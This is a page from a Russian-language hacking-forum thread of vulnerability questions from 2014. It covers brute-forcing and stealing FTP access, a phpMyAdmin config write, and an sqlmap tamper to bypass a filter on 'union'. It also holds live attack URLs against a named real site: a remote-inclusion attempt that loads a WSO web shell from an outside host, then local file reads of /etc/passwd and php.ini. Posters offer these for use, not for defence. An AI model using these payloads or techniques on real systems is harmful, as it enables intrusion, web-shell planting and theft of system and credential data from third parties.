HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2331 из 2438 « Первая < 13311831223122812321 2327 2328 2329 2330 2331 2332 2333 2334 2335 234123812431 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #23301  
Старый 15.02.2014, 17:04
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
Цитата:
Сообщение от CoolHucker  
Добрый вечер
Подскажите пожалуйста как брутят и добывают шеллы или Ftp доступы?!
Сканил сайт webcruiserom скулю находит раскрутить не может..Помогите чайнику(
Брутят, вы не поверите, брутом. Все тупо до безобразия. Фтп как правило тырят ботами с машин. Шеллы массово - через дыры в популярных цмс.

Сканер выкидывайте и учитесь работать руками. Когда сможете написать свой или с первого взгляда описать алгоритм любого такого сканера - тогда и будет толк от их использования.
 
Ответить с цитированием

  #23302  
Старый 16.02.2014, 20:11
lansia
Участник форума
Регистрация: 06.02.2011
Сообщений: 111
С нами: 8033366

Репутация: 5
По умолчанию
Допустим есть myadmin/setup/ и вроде есть права на запись config.inc.php. Но при переходе по MyAdmin//config/config.inc.php 404 error. что можно сделать?
 
Ответить с цитированием

  #23303  
Старый 17.02.2014, 05:17
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию
Цитата:
Сообщение от lansia  
Допустим есть myadmin/setup/ и вроде есть права на запись config.inc.php. Но при переходе по MyAdmin//config/config.inc.php 404 error. что можно сделать?
м.б слэш лишний? или путь /etc/phpmyadmin/config.inc.php
 
Ответить с цитированием

  #23304  
Старый 17.02.2014, 14:26
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами: 6747446

Репутация: 32
По умолчанию
Как в sqlmap сделать ,чтоб при сканировании ссылки sqlmap использовал union не такой простой ,а такой /*!union*/
 
Ответить с цитированием

  #23305  
Старый 18.02.2014, 07:45
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
Цитата:
Сообщение от WallHack  
Как в sqlmap сделать ,чтоб при сканировании ссылки sqlmap использовал union не такой простой ,а такой /*!union*/
Как подсказывает ман:

Цитата:
Сообщение от None  
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
 
Ответить с цитированием

  #23306  
Старый 21.02.2014, 18:51
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию
Приветствую,вообщем нужно мне подтянуть знания по RFI

Вопрос собственно -как проинклюдить ,почему не получается и как можно решить?

Для примера нашел вот

h**p://careers.ieee.org/test/redesign/proxy.php?url=http://files.xakep.biz/shells/PHP/wso.txt
 
Ответить с цитированием

  #23307  
Старый 21.02.2014, 19:31
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от grimnir  
Приветствую,вообщем нужно мне подтянуть знания по RFI
Вопрос собственно -как проинклюдить ,почему не получается и как можно решить?
Для примера нашел вот
h**p://careers.ieee.org/test/redesign/proxy.php?url=http://files.xakep.biz/shells/PHP/wso.txt
просто читалка.

http://careers.ieee.org/test/redesign/proxy.php?url=/etc/passwd

http://careers.ieee.org/test/redesign/proxy.php?url=http://www.spenneberg.org/phpinfo.txt
 
Ответить с цитированием

  #23308  
Старый 21.02.2014, 19:50
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию
Цитата:
Сообщение от попугай  
просто читалка.
http://careers.ieee.org/test/redesign/proxy.php?url=/etc/passwd
http://careers.ieee.org/test/redesign/proxy.php?url=http://www.spenneberg.org/phpinfo.txt
Вьехал, тогда буду LFI использовать. Интересно было просто почему команды не выполняются при RFI инклюде.

А читалкой поищу что-нибудь полезное )

http://careers.ieee.org/test/redesign/proxy.php?url=/usr/local/lib/php.ini
 
Ответить с цитированием

  #23309  
Старый 21.02.2014, 20:17
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от grimnir  
Вьехал, тогда буду LFI использовать. Интересно было просто почему команды не выполняются при RFI инклюде.
Там нет ни RFI, ни LFI. Есть RFR и LFR(Remote File Reading и Local File Reading)
 
Ответить с цитированием

  #23310  
Старый 22.02.2014, 14:14
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию
никто не в курсе как через БД joomla найти путь к сайту которому эта БД пренадлежит
 
Ответить с цитированием
Ответ
Страница 2331 из 2438 « Первая < 13311831223122812321 2327 2328 2329 2330 2331 2332 2333 2334 2335 234123812431 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.